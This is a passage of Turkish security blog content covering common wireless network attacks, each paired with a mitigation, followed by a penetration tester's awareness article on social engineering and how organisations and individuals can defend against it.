Kurum bünyesindeki ağ cihazlarına ait güvenlik denetimi arttırılarak sahte wireless cihazlarının ağa dahil olması önlenmelidir.
<br><br>
<b>Noktadan Noktaya Saldırılar:</b>
<br><br>
Aynı erişim noktasına bağlı cihazların birbiri tarafından zafiyetlerin sömürülmesi ve saldırıya uğramasıyla gerçekleşmektedir.
<br><br>
Çoğu sağlayıcı “Client Isolation” opsiyonunu kullanarak, aynı erişim noktasına bağlı cihazların birbiri ile haberleşmesini engelleyerek, bu saldırı çeşidini ortadan kaldırmaktadırlar.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-itKUTwFSHZQ/X-BrQ5sl54I/AAAAAAAAAJ8/BkX46bxfh2MIYBsqfGjyvMN2EtRQgAEXgCLcBGAsYHQ/s431/2.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" height="320" data-original-height="431" data-original-width="376" src="https://1.bp.blogspot.com/-itKUTwFSHZQ/X-BrQ5sl54I/AAAAAAAAAJ8/BkX46bxfh2MIYBsqfGjyvMN2EtRQgAEXgCLcBGAsYHQ/s320/2.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Wireless cihazlarına ait noktadan noktaya bağlantıları noktasında ağın güvenliği için haberleşmenin güvenli kanallar üzerinden yapılması önerilmektedir.
<br><br>
<b>Kulak Misafiri Saldırısı (Eavesdropping):</b>
<br><br>
Bu tür saldırılar, cihazların birbiri ile haberleşirken kablosuz ağ trafiğinin dinlenmesi ile ortaya çıkan saldırılardır. İki tür saldırı çeşidi bulunmaktadır.
<br><br>
İlk olarak, sıradan bir kulak misafirliğinde ya da başka bir deyişle WLAN keşfedilmesi, aktif olarak kablosuz ağ erişim noktalarının taranmasıdır.
<br><br>
İkinci olarak, zararlı kulak misafirliğinde illegal olarak davranılmaktadır. Bu saldırı türünde erişim noktası ile kullanıcı arasındaki veri transferi dinlenilmeye çalışılmaktadır. Bu nedenle, ağınızı şifrelemek gereklidir. Çünkü şifrelenmemiş herhangi bir noktayı saldırgan dinleyebilmektedir.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-lTLUWsAc5yc/X-Br57Bx4MI/AAAAAAAAAKM/DQiNZjZCKN0YAoQEbPP6l90LSXz1NwIWgCLcBGAsYHQ/s897/3.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="444" data-original-width="897" src="https://1.bp.blogspot.com/-lTLUWsAc5yc/X-Br57Bx4MI/AAAAAAAAAKM/DQiNZjZCKN0YAoQEbPP6l90LSXz1NwIWgCLcBGAsYHQ/s320/3.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Eavesdropping saldırılarına karşı alınması gereken çözüm haberleşmenin şifreli kanallar üzerinden gerçekleştirilmesidir.
<br><br>
<b>Parola Kırma Saldırıları:</b>
<br><br>
Bu saldırılarda, saldırgan kablosuz ağının parolasını kırmaya çalışmaktadır. WEP standardı kullanan ağlar bu saldırılar için daha uygun bir nokta oluşturmaktadır. Kolayca, beş dakikalık bir süre zarfında kırılabilmektedirler. WPA2- WPA3 gibi daha güvenli bir şifreleme standardı kullanılması ağınız için daha güvenli bir nokta oluşturmaktadır.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-v4fy2qopX70/X-BsJI6dxzI/AAAAAAAAAKQ/hLR6t6xkZqAtpHwPfojNHT24MH0HvQCewCLcBGAsYHQ/s1144/4.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="418" data-original-width="1144" src="https://1.bp.blogspot.com/-v4fy2qopX70/X-BsJI6dxzI/AAAAAAAAAKQ/hLR6t6xkZqAtpHwPfojNHT24MH0HvQCewCLcBGAsYHQ/s320/4.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Parola kırma saldırılarına karşı alınması gereken en büyük önlem kablosuz ağ cihazının WEP modundan çıkarılmasıdır. WPA2 – WPA3 gibi güçlü protokolleri kullanılması bu tarz saldırılar için önem taşımaktadır.
<br><br>
<b>Kimlik Doğrulama Saldırıları:</b>
<br><br>
WPA ve WPA2 standardı kullanılan ağlarda, kablosuz ağ ve istemci arasındaki kimlik doğrulama çerçevesi yakalanarak offline olarak sözlük saldırısı ile gerçekleştirilen bir saldırı türüdür.
<br><br>
WPA ve WPA2 ağları için kaba-kuvvet saldırıları yapılarak ağınızın parolası elde edilmeye çalışılmaktadır. Ağınızın daha güvenli olması için uzun karakterli, sembolü bulunan ve tanıdık olmayan parolalar kullanılması bu noktada önem taşımaktadır.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-c-FfgIvEsp4/X-Bs6nF-9nI/AAAAAAAAAKg/P5iSijxf-i4nQNIZX6LDOVvjclHSSfHbgCLcBGAsYHQ/s640/5.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="326" data-original-width="640" src="https://1.bp.blogspot.com/-c-FfgIvEsp4/X-Bs6nF-9nI/AAAAAAAAAKg/P5iSijxf-i4nQNIZX6LDOVvjclHSSfHbgCLcBGAsYHQ/s320/5.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Kimlik doğrulama saldırılarına karşı alınması gereken önlem şifrenizin fazla ve çeşitli sayıda karakter içermesidir.
<br><br>
<b>MAC Sahtekarlığı:</b>
<br><br>
Ağ içinde MAC adresi değiştirilerek başka bir kullanıcı gibi davranılması üzerinden gidilen bir saldırı çeşididir. Saldırıyı gerçekleştirmek oldukça basittir; çünkü, güvenlik ve MAC adreslerinin kontrolü için kullanılan MAC filtreleme işlemi basitçe atlatılabilmektedir.
<br><br>
Güvenlik noktasında mimari olarak bir güvenlik şekli ele alınmalı ve diğer güvenlik araçları ile güçlendirilme sağlanmalıdır.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-dn_9Fdu_JOg/X-BtocIvbEI/AAAAAAAAAKo/mKk2gXDfEBQuWqSdJAFX62NeiwGx3DcngCLcBGAsYHQ/s274/6.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="252" data-original-width="274" src="https://1.bp.blogspot.com/-dn_9Fdu_JOg/X-BtocIvbEI/AAAAAAAAAKo/mKk2gXDfEBQuWqSdJAFX62NeiwGx3DcngCLcBGAsYHQ/s320/6.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Ağdaki son noktalarda(Endpoint) tehdit önleyici(Threat Protection) yazılımlar kullanılarak Mac sahteciliğinin önüne geçilebilmektedir.
<br><br>
<b>Yönetim Paneli Sömürülmesi:</b>
<br><br>
Bu tür saldırılarda, saldırgan kablosuz ağ ile bağlantı kurduktan sonra web ara yüzü veya konsol erişim noktası üzerinden ağ cihazına erişip sömürmesi ile oluşmaktadır.
<br><br>
Varsayılan erişim bilgileri internette bulunmaktadır, bu tür saldırıları önlemek için varsayılan kimlik bilgilerini değiştirmek zaruridir.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-1170Bhug6s4/X-Bt3dtao2I/AAAAAAAAAKs/sn2pv4npj2AZhSb7Op6KW1NsS7_hQPkWQCLcBGAsYHQ/s613/7.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="468" data-original-width="613" src="https://1.bp.blogspot.com/-1170Bhug6s4/X-Bt3dtao2I/AAAAAAAAAKs/sn2pv4npj2AZhSb7Op6KW1NsS7_hQPkWQCLcBGAsYHQ/s320/7.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Yönetim panellerinin sömürülmesinin önüne geçilmesi noktasında, varsayılan kimlik bilgilerinin değiştirilmesi ve ağ cihazlarını güncellenmelidir.
<br><br>
<b>Wireless Gaspı (Wireless Hijacking):</b>
<br><br>
Saldırgan, kablosuz ağ noktasının ID’si (adı) ile aynı olacak şekilde bir erişim noktası açmaktadır. Açtığı erişim noktasını yayınlayarak kullanıcıları kendi erişim noktasına çekmektedir. Saldırının farklı bir türü Evil Twin metodu olarak da geçmektedir.
<br><br>
Erişim noktasını yayınladıktan sonra saldırgan bekleyerek kurbanlarının ağa dahil olmasını beklemektedir. Kullanıcılar ağa bağlandıktan sonra noktadan noktaya saldırısında olduğu gibi kurbanların ağ trafiğini dinlemektedir.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-YHFn7ErMj6o/X-BuQCP4gLI/AAAAAAAAAK4/hphQWWB2xpwo5ojfvvTnwII_Hw_MZ0AvwCLcBGAsYHQ/s767/8.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="541" data-original-width="767" src="https://1.bp.blogspot.com/-YHFn7ErMj6o/X-BuQCP4gLI/AAAAAAAAAK4/hphQWWB2xpwo5ojfvvTnwII_Hw_MZ0AvwCLcBGAsYHQ/s320/8.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Wireless Hijacking saldırılarının önüne geçilmesi için Access point cihazının bağlantı kurduğu cihazlarla arasında güçlü ve şifrelenmiş bir session ID kullanması gerekmektedir.
<br><br>
<b>Servis Dışı Bırakma Saldırısı:</b>
<br><br>
DoS saldırısı olarak da adından çokça bahsettiren DoS saldırısı farklı katmanlarda gerçekleşebilmektedir.
<br><br>
Katman 1 noktasında Jamming saldırıları gerçekleştirilerek, kullanıcıların erişim noktalarına bağlanamaması için bozucu sinyaller yollanmaktadır.
<br><br>
Katman 2 noktasında farklı çeşitte saldırılar bulunmaktadır. Saldırgan erişim noktasına Flood saldırıları yaparak devre dışı bırakabilmektedir.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-glkkhE66xWU/X-Bunji0NOI/AAAAAAAAALE/824CKwQM-YkZ4eZnJYt2G5mDpvOujuezwCLcBGAsYHQ/s540/9.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="363" data-original-width="540" src="https://1.bp.blogspot.com/-glkkhE66xWU/X-Bunji0NOI/AAAAAAAAALE/824CKwQM-YkZ4eZnJYt2G5mDpvOujuezwCLcBGAsYHQ/s320/9.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Genellikle mesh topolojilerinde karşılaşılan bu saldırı türünde ağdaki cihazların yönlendirme algoritmalarını bu tür saldırılara karşı konfigüre edilmesi önerilmektedir.
<br><br>
<b>Sosyal Mühendislik:</b>
<br><br>
Popüler olarak bilinenlerin yanı sıra en başarılı saldırganlar bile kablosuz ağ saldırılarını yazılımlar veya araçlar ile değil, sosyal mühendislik ile gerçekleştirmektedirler.
<br><br>
İnsanlar manipüle edilerek bilgi toplanılmaktadır. Bu tür saldırıların önüne geçilmesi için insanların veya çalışanları güvenlik prosedürleri noktasında eğitilmesi gerekmekte ve düzenli olarak parola değişikliği üzerinde durulması gerekmektedir.
<div class="separator" style="clear: both;"><a href="https://1.bp.blogspot.com/-8vsb_gHAEBg/X-Bu29uMKvI/AAAAAAAAALM/8JOTA5IsqVYrOCK-q0SR4BOkOgeTrmROACLcBGAsYHQ/s941/10.jpg" style="display: block; padding: 1em 0; text-align: center; "><img alt="" border="0" width="320" data-original-height="725" data-original-width="941" src="https://1.bp.blogspot.com/-8vsb_gHAEBg/X-Bu29uMKvI/AAAAAAAAALM/8JOTA5IsqVYrOCK-q0SR4BOkOgeTrmROACLcBGAsYHQ/s320/10.jpg"/></a></div>
<b>Çözüm Önerisi:</b>
<br><br>
Kurum çalışanlarına belirli periyotlarda farkındalık eğitimleri verilmelidir. Kurum çalışanlarına verilecek bu eğitimlerde olası risklerden bahsedilmelidir. Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-53110652491630726582020-09-28T14:16:00.004+03:002020-10-02T11:20:06.545+03:00Günümüzün Mesleği; Sosyal Mühendislik<div class="separator"><br /></div><div class="separator"> <b style="text-align: justify;"><i><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">"Benim özel bir yeteneğim yok. Yalnızca tutkulu bir meraklıyım."
-Albert Einstein</span></i></b></div><p style="text-align: right;"><span style="text-align: justify;"><span lang="TR" style="line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;"><i>Kübra Eskalan - Sızma Testi Uzmanı</i></span></span></p><p></p><p class="MsoNormal" style="text-align: justify;"><b><span lang="TR" style="font-size: 16pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Günümüzün Mesleği; Sosyal Mühendislik<o:p></o:p></span></b></p>
<p class="MsoNormal" style="text-align: justify;"><b><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Sosyal mühendislik</span></b><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">, sistemlerdeki insan
faktörünü kullanıp etkileşim sağlayarak gizli kalması gereken bilgilerin ortaya
çıkarılması eylemidir. Bir nevi insanları manipüle etme tekniğidir. <o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Siber saldırganlar <b>sosyal
mühendislik</b> saldırılarını oldukça fazla kullanmaktadır. Çünkü genellikle
bir kişinin güvenini kazanıp parolasını veya kişisel bilgisini vermesi için
kandırmak, parolanın kırılması veya kişisel bilginin ele geçirilmesinden daha
kolaydır. Burada çoğu sistem için insan faktörü en tehlikeli açık olma
niteliğindedir. Sosyal mühendislik<b> </b>saldırılarında başarı durumunu en çok
etkileyen faktör ise saldırganın manipüle etme yeteneğidir. Çünkü başarılı
manipüleler ile kurbandan istenen eylemler yerine getirilmektedir. İkna edebilmek,
istenilen doğrultuda kişiye evet dedirtme sanatıdır. <o:p></o:p></span></p>
<p class="MsoNormal" style="text-align: justify;"></p><div style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; text-align: center;"><img data-original-height="1365" data-original-width="2048" height="213" src="https://lh3.googleusercontent.com/-X8Ao37ZdXu4/X3G--Q3q9cI/AAAAAAAAAGA/2jCrEpI3l2wqCtFWAc0ERRLaEWTXRVvWACNcBGAsYHQ/w320-h213/3879141.jpg" width="320" /></div><!--[if gte vml 1]><v:shapetype
id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_2" o:spid="_x0000_s1026" type="#_x0000_t75"
style='position:absolute;left:0;text-align:left;margin-left:168.35pt;
margin-top:.2pt;width:290.2pt;height:193.5pt;z-index:-251657216;visibility:visible;
mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;
mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;
mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;
mso-position-horizontal-relative:text;mso-position-vertical:absolute;
mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;
mso-width-relative:margin;mso-height-relative:margin'>
<v:imagedata src="file:///C:/Users/kubes/AppData/Local/Temp/msohtmlclip1/01/clip_image001.jpg"
o:title=""/>
<w:wrap type="tight"/>
</v:shape><![endif]--><br /><div style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Günümüzde sosyal mühendislik saldırılarının sayısı oldukça artmıştır
ve artmaya devam etmektedir. Bununla doğru orantılı olarak bu saldırıların
karmaşıklığı ve gerçekçiliği de oldukça artmaktadır. Bu tehlikeye karşı
firmalar elemanlarının güvenlik konusundaki eğitimlerini ilk savunma hattı
olarak görmelidirler. Çünkü insanlar, güvenlik zincirinin oluşumunda en zayıf
halka varsayılmaktadır. Güvenlik ise neye ve kime güvenileceğini bilmekle
ilgilidir. Bu yüzden sosyal mühendislik saldırılarının savun</span><span style="font-size: 12pt;">ması hiç
kolay değildir. Çünkü insanlar tahmin edilemez ve öngörülemezdir. Yani bir
şirkette hangi elemanın bu saldırıya inanacağını bilemezsiniz. Saldırganlar ise
bu belirsizlik karşısında hedef yelpazesini olabildiğince geniş tutarak başarı
oranlarını arttırmaya çalışmaktadırlar. Bu şekilde hedeflerden birinin
hazırlıksız olduğu bir ana denk gelebilme ihtimallerini yükseltirler. Çünkü
insan doğasında; dikkatsizlik, meşguliyet, güvenlik bilinçsizliği vb.
özellikler bulunmakta ve normal kabul edilmektedir. Bu yüzden firmalar
elemanlarını siber güvenlik üzerine bilinçlenmelerini sağlamak amaçlı kaynak,
eğitim ve araçlar sağlamalıdırlar.</span></div><p></p><p class="MsoNormal" style="text-align: justify;"><b><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Sosyal mühendislik</span></b><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;"> saldır</span><span style="font-size: 12pt;">ıları internet
üzerinden ya da fiziki etkileşimler ile gerçekleşebilmektedir. Bunun için
insanların eylemlerinin ne üzerine kurulu olduğu hakkında araştırma yaparak
manipüle safhası için büyük yol kat edilebilir. Günümüz teknoloji çağında ise
insanların zaaflarını bulma konusunda sıkıntı yaşandığı söylenemez. Bu yüzden </span><span style="font-size: 12pt;">sosyal
mühendislik</span><span style="font-size: 12pt;"> firmalar için en tehlikeli saldırı yöntemlerinden biridir.
Çünkü firmalar sistemlerinde teknik bir açık bulunmadan da bu saldırıya maruz
kalabilmektedirler. Bu yönüyle geleneksel saldırılardan oldukça farklıdır. Kime
ne koşullarda güvenmemiz gerektiğini bilmemiz gerekmektedir. Kendi firmanız
için alabildiğiniz tüm fiziki önlemleri almışsınızdır. Fakat kapıda tamirci
olduğunu ve içeri girmesi gerektiğini söyleyen bir kişinin sözlerinin
doğruluğunun kontrol edilmeden içeri alınmasına izin verilmiştir. O halde bu
durumun beraberinde getireceği risklerden sizi fiziksel önlemleriniz
korumamakta olduğunu geçte olsa fark edeceksinizdir.</span></p><p class="MsoNormal" style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;"><br /></span></p><p class="MsoNormal" style="text-align: justify;"><b><span lang="TR" style="font-size: 16pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Sosyal Mühendislik Saldırılarından Korunmak<o:p></o:p></span></b></p><p class="MsoNormal" style="text-align: justify;"><!--[if gte vml 1]><v:shapetype
id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t"
path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
<v:stroke joinstyle="miter"/>
<v:formulas>
<v:f eqn="if lineDrawn pixelLineWidth 0"/>
<v:f eqn="sum @0 1 0"/>
<v:f eqn="sum 0 0 @1"/>
<v:f eqn="prod @2 1 2"/>
<v:f eqn="prod @3 21600 pixelWidth"/>
<v:f eqn="prod @3 21600 pixelHeight"/>
<v:f eqn="sum @0 0 1"/>
<v:f eqn="prod @6 1 2"/>
<v:f eqn="prod @7 21600 pixelWidth"/>
<v:f eqn="sum @8 21600 0"/>
<v:f eqn="prod @7 21600 pixelHeight"/>
<v:f eqn="sum @10 21600 0"/>
</v:formulas>
<v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_3" o:spid="_x0000_s1026" type="#_x0000_t75"
style='position:absolute;left:0;text-align:left;margin-left:.4pt;margin-top:95.9pt;
width:150pt;height:150pt;z-index:-251656192;visibility:visible;
mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;
mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;
mso-position-horizontal:absolute;mso-position-horizontal-relative:text;
mso-position-vertical:absolute;mso-position-vertical-relative:text'>
<v:imagedata src="file:///C:/Users/kubes/AppData/Local/Temp/msohtmlclip1/01/clip_image001.jpg"
o:title=""/>
<w:wrap type="tight"/>
</v:shape><![endif]--><br /><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Artık birçok siber saldırının doğrudan veya dolaylı yoldan sosyal
mühendislik içerdiğini söyleyebiliriz. Bu tehditten kendimizi korumak için
hem bireysel hem kurumsal olarak birtakım güvenlik politikalarını yaşam
tarzımız haline getirmek zorunda olduğumuzu farkına varmalıyız. Bu saldırıya
karşı kendimizi eğitim ile koruyabi</span><span lang="TR" style="font-size: 12pt; line-height: 107%;">liri</span><span lang="TR" style="font-size: 12pt; line-height: 107%;">z. Herkes bu konuda eğitimli ve bilinçli
olursa güvenlik de artacaktır. Kendi bildiklerimiz ile </span><span lang="TR" style="font-size: 12pt; line-height: 107%;">etrafımızdakilerde</span><span lang="TR" style="font-size: 12pt; line-height: 107%;"> farkındalık yaratırsak toplum olarak güvenlik konusunda amacımıza ulaşmış </span><span style="font-size: 12pt;">oluruz.</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-jL9mggMvkoo/X3HAvgz3K7I/AAAAAAAAAGU/kvZ0gDMQQ6AkP68XqgLRCX2CFfNK-GsLQCNcBGAsYHQ/s626/illustration-cloud-security-icon_53876-6325.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="626" data-original-width="626" height="199" src="https://1.bp.blogspot.com/-jL9mggMvkoo/X3HAvgz3K7I/AAAAAAAAAGU/kvZ0gDMQQ6AkP68XqgLRCX2CFfNK-GsLQCNcBGAsYHQ/w199-h199/illustration-cloud-security-icon_53876-6325.jpg" width="199" /></a></div><p></p><p class="MsoNormal" style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Bu politikalar için
öncelikle kuruluşun olası bir <b>sosyal mühendislik</b> saldırısı durumunda ne
yapacağını ve ne sonuçlar doğuracağını tecrübe edebilmek için <b>sızma testleri</b>
gerçekleştirilmelidir. Bu şekilde test sonrası verilecek rapor ile harekete
geçilmesi gerekmektedir. Olası riskler belirlendikten sonra ise personel eğitimleri
düzenlenmeli ve bilinçlenme sağlanmalıdır. Aşağıda <b>sosyal mühendislik</b> ve
olası herhangi bir siber saldırıya karşı almanız gereken genel kurallar
verilmiştir.</span></p><p class="MsoNormal" style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;"><br /></span></p><div class="separator"><div><p class="MsoNormal" style="margin-left: 18pt; text-align: justify;"></p><ul><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Kişinin kendi ve çalışanlarında siber güvenliğe dair öz farkındalık oluşturulmalıdır.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Kişiler önemli bir sonuç doğurabilecek konularda karar vermeden önce
yavaşlayıp düşünme alışkanlığı edinmelidir. Çünkü saldırganların istediği
düşünmeden acele hareket etme eylemidir.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Öğrenmeye ilham verecek çalışma ortamı oluşturularak çalışanlara siber
güvenlik konusunda eğitimler verilmeli ve teşvik edilmelidir.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">E-posta spam filtreleri yüksek
derecede tutulmalıdır. Bu şekilde sosyal mühendislik için yollanan
e-postalar spam kutusuna düşerek bir nevi engellenmektedir.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Kişisel bilgilerimizi isteyen bir mesajın yanıtlanması istenirse kesinlikle
yanıtlanmamalıdır. Ayrıca güvenilir olmayan kaynaktan gelen e-postalara
kesinlikle tıklanmamalıdır.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Kişide sosyal mecra güvenliği algısı oluşturulmalıdır. Çünkü sosyal mecra
en çok bilgi paylaşıp en savunmasız olduğumuz yerdir.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Kişisel bilgilerimizin adlarını (anne-baba, evcil hayvan, ilkokul vb.)
paylaşmaktan kaçınılmalıdır.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Kişiler gerçek e-posta ile sahtesi arasındaki farkı anlayabilmek için
bilinçlendirilmelidir. Örneğin e-postayı gönderenin e-posta adresi, tarafından
gönderdiğini iddia ettiği firmanın alan adı ile uyuşmuyorsa bu e-posta
sahtedir. Veya e-posta sizlere gereksiz bir şekilde bir ödül vadediyorsa
(dikkat çekici bir hediye olabilir) tuzağa düşürülmek isteniyor olabilirsiniz.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Hesaplarımızın çalınma ihtimaline karşı bir katman daha güvenlik almak için
olabilecek tüm hesaplarda çok faktörlü kimlik doğrulama kullanılmalıdır. Ve
kesinlikle tüm hesaplarımızın parolaları birbirinden farklı ve karmaşık
olmalıdır.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%;">Cihazlarınızdaki güvenlik duvarı,
anti virüs yazılımları güncel tutulmalıdır.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Sahte olduğu anlaşılan bir e-postaya cevap bile verilmemesi gerekmektedir.
Bu şekilde gerçek olmadığınızı düşünerek size başka yollarla da ulaşmak için
çabalamazlar.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">Hiçbir cihazı halka açık alanlarda şifresiz, tedbirsiz bırakılmaması
gerekmektedir. Mutlaka kitlenmeli ve güvence altına alınmalıdır.</span></li><li style="text-align: justify;"><span lang="TR" style="font-size: 12pt; line-height: 107%; mso-ansi-language: TR; mso-ascii-font-family: Calibri; mso-bidi-font-family: Calibri; mso-hansi-font-family: Calibri;">İnternet üzerinden kurulan arkadaşlıklarda verilen bilgilere ve manipüle
edilmemeye dikkat edilmelidir.</span></li></ul><p></p>
